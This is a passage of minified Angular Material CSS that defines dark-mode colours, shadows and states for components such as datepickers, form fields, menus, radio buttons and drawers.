.mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(244,67,54,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f4433666}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}@media (hover: hover){.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content-touch[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle-active[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle-active.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle-active.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-date-range-input-inner[disabled][_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-dialog-container[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f;background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-divider[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-divider-vertical[_ngcontent-%COMP%]{border-right-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-action-row[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-keyboard-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-program-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded)   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover:not([aria-disabled=true]){background:rgba(255,255,255,.04)}@media (hover: none){.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded):not([aria-disabled=true])   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover{background:#424242}}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-expansion-indicator[_ngcontent-%COMP%]:after{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{color:inherit}.darkMode[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-hint[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid)   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-accent   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-warn   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-error[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-hint[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(255,255,255,.7) 0%,rgba(255,255,255,.7) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-standard[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-standard.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(255,255,255,.7) 0%,rgba(255,255,255,.7) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#ffffff0d}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-focused[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-form-field-invalid.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#ffffff26}.darkMode[_ngcontent-%COMP%]   .mat-icon.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-icon.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-icon.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:disabled, .darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]::placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]::-moz-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]::-webkit-input-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:-ms-input-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:not(.mat-native-select-inline)   option[_ngcontent-%COMP%]{color:#000000de}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:not(.mat-native-select-inline)   option[_ngcontent-%COMP%]:disabled{color:#00000061}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-accent[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-warn[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field-invalid[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-list-item-disabled[_ngcontent-%COMP%]{background-color:#ffffff1f;color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]:focus, .darkMode[_ngcontent-%COMP%]   .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus, .darkMode[_ngcontent-%COMP%]   .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus{background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-list-single-selected-option[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-list-single-selected-option[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-list-single-selected-option[_ngcontent-%COMP%]:focus{background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-menu-panel[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-menu-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[_ngcontent-%COMP%]{background:transparent;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[disabled][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-menu-submenu-icon[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-menu-submenu-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[_ngcontent-%COMP%]:hover:not([disabled]), .darkMode[_ngcontent-%COMP%]   .mat-menu-item.cdk-program-focused[_ngcontent-%COMP%]:not([disabled]), .darkMode[_ngcontent-%COMP%]   .mat-menu-item.cdk-keyboard-focused[_ngcontent-%COMP%]:not([disabled]), .darkMode[_ngcontent-%COMP%]   .mat-menu-item-highlighted[_ngcontent-%COMP%]:not([disabled]){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-paginator[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-paginator[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-paginator-page-size[_ngcontent-%COMP%]   .mat-select-trigger[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-paginator-decrement[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-paginator-increment[_ngcontent-%COMP%]{border-top:2px solid white;border-right:2px solid white}.darkMode[_ngcontent-%COMP%]   .mat-paginator-first[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-paginator-last[_ngcontent-%COMP%]{border-top:2px solid white}.darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-decrement[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-increment[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-first[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-last[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#2c4a61}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#2c4a61}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#432c4d}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#432c4d}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#613532}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#613532}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-progress-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-progress-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-progress-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%]{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-label-content[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-radio-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-select-placeholder[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-select-disabled[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-select-panel[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-select-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-select-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple){background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused.mat-primary[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-invalid[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-disabled[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-drawer-container[_ngcontent-%COMP%]{background-color:#303030;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-drawer[_ngcontent-%COMP%]{background-color:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-drawer.mat-drawer-push[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-drawer[_ngcontent-%COMP%]:not(.mat-drawer-side){box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-drawer-side[_ngcontent-%COMP%]{border-right:solid 1px rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%], 